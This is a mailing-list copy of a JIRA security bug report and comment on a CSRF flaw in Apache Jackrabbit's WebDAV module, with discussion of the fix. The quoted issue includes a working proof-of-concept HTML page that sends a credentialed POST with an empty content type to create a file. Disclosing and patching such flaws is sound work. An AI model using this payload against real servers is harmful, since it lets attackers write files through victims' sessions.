You are viewing a plain text version of this content. The canonical link for it is here.

Posted to dev@jackrabbit.apache.org by "Julian Reschke (JIRA)" <ji...@apache.org> on 2016/08/29 12:27:20 UTC

[jira] [Comment Edited] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

    [ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424812#comment-15424812 ] 

Julian Reschke edited comment on JCR-4002 at 8/29/16 12:27 PM:
---------------------------------------------------------------

But that means that code extending from this now will have to the CSRF protection, right? If this is true, we need (a) to document that and (b) to review the existing code that *does* extend it (JSOP?), (c) figure out whether code written by third-parties might be affected as well.


was (Author: reschke):
But that means that code extending from this now will have to the CSRF protection, right? If this is true, we need (a) to document that and (b) to review the existing code that *does* extend it (JSOP?).

> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2
>
>         Attachments: JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request content type. This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" />
>     </form>
>   </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)